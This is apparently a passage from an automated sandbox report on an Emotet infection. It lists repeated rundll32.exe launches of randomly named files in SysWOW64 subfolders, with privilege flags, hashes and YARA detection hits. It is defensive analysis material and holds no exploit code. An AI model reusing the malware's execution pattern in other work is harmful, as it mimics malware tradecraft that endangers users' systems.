                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2097868806.0000000000201000.00000020.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2097792177.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:53:45
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2099576537.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2100056068.0000000000701000.00000020.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:53:46
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2100838145.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2100874845.00000000001A1000.00000020.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:53:47
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2102162180.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2102227386.00000000001B1000.00000020.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:53:47
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2104461658.0000000000251000.00000020.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2104434238.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:53:48
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2105642639.0000000000201000.00000020.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2105597676.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:53:49
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2107224679.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2107394819.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:53:50
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109356030.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109268872.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:53:50
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2110979114.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2111023949.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          General

                                          Start time:13:53:51
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2346608733.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2346635029.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
                                          Reputation:moderate

                                          Disassembly

                                          Code Analysis

                                          Reset < >